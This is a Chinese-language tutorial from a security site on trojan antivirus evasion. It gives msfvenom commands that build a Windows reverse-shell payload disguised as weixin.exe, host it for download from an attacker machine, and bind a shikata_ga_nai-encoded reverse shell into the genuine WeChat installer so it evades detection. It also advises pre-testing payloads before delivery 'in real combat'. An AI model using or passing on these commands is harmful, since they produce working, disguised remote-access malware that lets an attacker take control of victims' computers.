滲透測試-木馬免殺的幾種方式 - 網安 - 專業的網絡安全產業、社區、知識平臺

免殺，又叫免殺毒技術，是反病毒，反間諜的對立面，是一種能使病毒或木馬免于被殺毒軟件查殺的軟件。它除了使病毒木馬免于被查殺外，還可以擴增病毒木馬的功能，改變病毒木馬的行為。免殺的基本特征是破壞特征，有可能是行為特征，只要破壞了病毒與木馬所固有的特征，并保證其原有功能沒有改變，一次免殺就能完成了。免殺技術也并不是十惡不赦的，例如，在軟件保護所用的加密產品（比如殼）中，有一些會被殺毒軟件認為是木馬病毒；一些安全領域中的部分安全檢測產品，也會被殺毒軟件誤殺，這時就需要免殺技術來應對這些不穩定因素。

1、裸奔馬的嘗試

意為不做任何免殺處理的木馬

1、使用msf的msfvenom生成木馬文件，生成一個裸奔馬，命名為 weixin.exe吧

命令：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=8888 -f exe > weixin.exe

2、部署一下kali上的apache服務，令目標機器能夠訪問下載我們生成的木馬

2.1、kali中是自帶有apache的，啟動apache服務

2.2、把生成的weixin.exe文件放在/var/www/html文件夾下

2.3、在靶機下訪問192.168.111.132/weinxin.exe，已經下載

2.4、發現被AV查殺

如果在實戰中，直接投遞裸奔馬比較容易引起對方運維人員的警覺，這種方式也比較冒險，所以在投遞之前，要測試制作的木馬是否會引起相關AV的查殺，比如在在線多引擎病毒識別工具中去測試

2.5、這里po一個在線殺毒查殺的網站，virustotal是一個提供免費的可疑文件分析服務的網站，它與傳統殺毒軟件的不同之處是它通過多種反病毒引擎掃描文件。使用多種反病毒引擎對您所上傳的文件進行檢測, 以判斷文件是否被病毒, 蠕蟲, 木馬, 以及各類惡意軟件感染。

2、MSF編碼

在metasploit框架下免殺的方式之一是msf編碼器，功能是使用msf編碼器對我們制作的木馬進行重新編碼，生成一個二進制文件，這個文件運行后，msf編碼器會將原始程序解碼到內存中并執行。

1、在kali終端輸入 msfvenom -l encoders，這可以列出所有可用的編碼格式

2、在msf的/data/templates/下有很多metasploit自帶的用于捆綁木馬的程序模板，這個模塊但是一些反病毒廠商關注的重點，為了更好的實現免殺，我們需要自主選擇一個待捆綁程序。在這里選擇是真正的微信安裝包。（也有對裸奔馬進行shikata_ga_nai編碼饒AV的方法，但是shikata_ga_nai編碼技術多態，每次生成的攻擊載荷文件都不一樣，有時生成的文件會被查殺，有時不會，所以結合以上思路，生成一個捆綁木馬，并進行shikata_ga_nai編碼）

把微信安裝包放在/root文件夾下

3、使用msfvenom生成一個Windows環境下的木馬，并捆綁到WeChatSetup.exe上生成WeChatSetup1.exe的合成馬，同時對木馬進行x86/shikata_ga_nai進行多次編碼的方式進行免殺處理。

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe